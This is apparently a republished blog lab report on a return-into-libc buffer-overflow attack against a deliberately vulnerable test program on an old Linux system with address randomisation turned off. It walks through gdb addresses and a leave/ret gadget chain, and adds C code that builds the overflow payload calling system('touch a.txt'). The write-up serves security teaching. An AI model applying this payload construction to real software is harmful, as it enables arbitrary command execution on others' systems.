return-into-libc experiment (lab report)

Disclaimer: This is an original article by the blogger, licensed under CC 4.0 BY-SA. When reproducing it, include the original source link and this statement.
Original link: https://blog.csdn.net/ALPS233/article/details/102682855

Experiment description

A return-into-libc attack (also known as arc injection) achieves the attacker's goal without injecting any code:
- the return address on the stack is overwritten with the address of code that already exists in the process, usually a library function such as system() or exec(), followed by the parameters that function expects;
- when the vulnerable function returns, system(), exec() or a similar function is called and executes the command named in its parameter, i.e. an arbitrary system command;
- by chaining such returns, return-into-libc can execute a whole sequence of functions.

Lab environment:

System: Linux localhost.localdomain 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 i686 i386 GNU/Linux

gdb: GNU gdb Red Hat Linux (6.1post-1.20040607.62rh) Copyright 2004 Free Software Foundation, Inc.

Experiment: carry out a return-into-libc attack under the debugger, calling system() to create a file in the current directory.

Experimental steps:

1) Write the test program and compile it with debugging symbols (gcc's -ggdb option): gcc -ggdb ret.c -o ret
Before the experiment, disable Exec-Shield's address randomization with sysctl -w kernel.exec-shield=0, otherwise the stack and library addresses read in gdb would not be stable between runs.

2) Debug in gdb: find the stack layout and the address of system().
Start the debugger with gdb ret.
b 6: set a breakpoint at line 6 of the source.
r: run until the breakpoint is hit.
Based on the principle of the attack, the stack is expected to hold buff, then the saved ebp, then the return address.
Note: since this experiment runs with root privileges, the seteuid(0) call in the test program is not needed for the attack to work.
Use gdb's p command to print &buff, the address of the saved ebp (which is not necessarily directly adjacent to buff), the value stored at that address, and the return address.


Obtained:
&buff: 0xbffff83c; address of the saved ebp: 0xbffff848 (so buff is 12 bytes); value stored there (the caller's ebp): 0xbffff878
return address: 0x080483f2, stored in the slot after the saved ebp, i.e. at 0xbffff84c = &buff+16

Continue in gdb to find the address of system() (for example with p system).
Then disassemble the program and find a leave / ret instruction sequence to use as the gadget.

Obtained: first address of the leave / ret sequence: 0x08048388
Counting within the same stack frame, the parameter of system() sits 16 bytes (the distance from &buff to the return-address slot) + 3 * 4 = 28 bytes from &buff, i.e. at &buff+7 in 4-byte units.
The three intervening dwords are the return-address slot (overwritten with the leave / ret address), the address of system(), and a fake return address for system(). The gadget's leave loads esp from the overwritten saved ebp and its ret then pops the next dword into eip, so system() is entered with the fake return address at [esp] and the pointer to its command string at [esp+4], exactly where a normal call would have placed them.

Parameter: "touch a.txt"

Construct buff with the above layout and run the program on it.
Result: the file is created in the current directory (the result screenshot shows it as hello), so the exploit is complete.
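The frame arithmetic worked out above, as an added example that is not part of the original post. The program assembles the 32-byte overflow string from the values read off the page (&buff = 0xbffff83c, saved ebp at &buff+12, leave / ret gadget at 0x08048388) and then runs a small model of the two leave;ret sequences over a constructed stack image, to confirm that control lands on system() with the command pointer at [esp+4]. The address of system() (0x42049e54) and the address of the string "touch a.txt" (0xbffffd10) are assumed placeholders; in the real experiment both come from gdb. The code does not run the exploit, it only checks the layout.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values read off the page's gdb session */
#define BUFF_ADDR   0xbffff83cu   /* &buff */
#define BUFF_SIZE   12u           /* saved ebp sits at 0xbffff848 = &buff+12 */
#define GADGET_ADDR 0x08048388u   /* first address of the leave / ret sequence */

/* Assumed values, NOT on the page: libc address of system() and the address
 * where "touch a.txt" has been placed (e.g. in the environment). */
#define SYSTEM_ADDR 0x42049e54u
#define CMD_ADDR    0xbffffd10u

#define PAYLOAD_LEN 32u           /* 16 bytes up to the return address + 4 dwords */
#define FAKE_RET    0x41414141u   /* where system() "returns"; the process crashes there */

static void put32(uint8_t *p, uint32_t v) {          /* little-endian store */
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *p) {            /* little-endian load */
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Lay out the overflow string. Offsets are from &buff:
 *   0..11  filler that fills buff itself
 *  12..15  saved ebp  -> &buff+16, so the gadget's leave moves esp to the
 *                       slot right after the return address
 *  16..19  return address -> leave;ret gadget
 *  20..23  address of system()
 *  24..27  fake return address for system()
 *  28..31  pointer to the command string (16 + 3*4 = 28, as computed on the page) */
void build_payload(uint8_t out[PAYLOAD_LEN], uint32_t buff_addr, uint32_t gadget,
                   uint32_t system_addr, uint32_t cmd_addr) {
    memset(out, 'A', BUFF_SIZE);
    put32(out + 12, buff_addr + 16);
    put32(out + 16, gadget);
    put32(out + 20, system_addr);
    put32(out + 24, FAKE_RET);
    put32(out + 28, cmd_addr);
}

/* A strcpy-style overflow stops at the first NUL, so the payload must contain none.
 * Returns the index of the first NUL byte, or -1 if the payload is clean. */
int payload_nul_index(const uint8_t *p, size_t len) {
    for (size_t i = 0; i < len; i++) if (p[i] == 0) return (int)i;
    return -1;
}

/* Minimal model of the i386 registers that matter for the chain */
typedef struct { uint32_t esp, ebp, eip; } cpu_t;

static uint32_t rd32(const uint8_t *stack, uint32_t addr) {
    uint32_t off = addr - BUFF_ADDR;            /* the stack image starts at &buff */
    return (off + 4 <= 64) ? get32(stack + off) : 0;
}

/* One `leave; ret`: mov esp,ebp / pop ebp / pop eip */
static void leave_ret(cpu_t *c, const uint8_t *stack) {
    c->esp = c->ebp;
    c->ebp = rd32(stack, c->esp); c->esp += 4;
    c->eip = rd32(stack, c->esp); c->esp += 4;
}

/* Copy the payload over a constructed 64-byte stack image starting at &buff (the
 * overflow), run the vulnerable function's epilog, then the gadget it returns into.
 * Returns the resulting eip; *arg_out receives [esp+4], the dword system() would
 * read as its first argument. */
uint32_t simulate_chain(const uint8_t *payload, size_t len, uint32_t *arg_out) {
    uint8_t stack[64] = {0};
    memcpy(stack, payload, len);
    cpu_t c = { 0, BUFF_ADDR + BUFF_SIZE, 0 };  /* ebp -> the frame's saved-ebp slot */
    leave_ret(&c, stack);                        /* function returns -> eip = gadget */
    if (c.eip == GADGET_ADDR) leave_ret(&c, stack);  /* gadget -> eip = system() */
    *arg_out = rd32(stack, c.esp + 4);
    return c.eip;
}

/* Wrappers that use the page's values and return one checkable result each */
uint32_t default_payload_dword(int slot) {
    uint8_t p[PAYLOAD_LEN];
    build_payload(p, BUFF_ADDR, GADGET_ADDR, SYSTEM_ADDR, CMD_ADDR);
    return get32(p + 4 * slot);
}
uint32_t default_chain_eip(void) {
    uint8_t p[PAYLOAD_LEN]; uint32_t arg;
    build_payload(p, BUFF_ADDR, GADGET_ADDR, SYSTEM_ADDR, CMD_ADDR);
    return simulate_chain(p, PAYLOAD_LEN, &arg);
}
uint32_t default_chain_arg(void) {
    uint8_t p[PAYLOAD_LEN]; uint32_t arg;
    build_payload(p, BUFF_ADDR, GADGET_ADDR, SYSTEM_ADDR, CMD_ADDR);
    simulate_chain(p, PAYLOAD_LEN, &arg);
    return arg;
}
int default_payload_nul_index(void) {
    uint8_t p[PAYLOAD_LEN];
    build_payload(p, BUFF_ADDR, GADGET_ADDR, SYSTEM_ADDR, CMD_ADDR);
    return payload_nul_index(p, PAYLOAD_LEN);
}

int main(void) {
    uint8_t p[PAYLOAD_LEN]; uint32_t arg;
    build_payload(p, BUFF_ADDR, GADGET_ADDR, SYSTEM_ADDR, CMD_ADDR);
    for (size_t i = 0; i < PAYLOAD_LEN; i++)       /* one dword per line */
        printf("\\x%02x%s", p[i], (i % 4 == 3) ? "\n" : "");
    uint32_t eip = simulate_chain(p, PAYLOAD_LEN, &arg);
    printf("eip after chain: 0x%08x, system() argument pointer: 0x%08x\n", eip, arg);
    return 0;
}
```

The saved-ebp slot is overwritten with &buff+16 so that the gadget's leave lands esp on the slot following the return address; the gadget's ret then pops the address of system(), which sees the fake return address at [esp] and the pointer to "touch a.txt" at [esp+4]. Because the payload is delivered by a string copy, payload_nul_index() checks that no byte before the end is zero; any address containing a 0x00 byte would have to be avoided or placed last.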
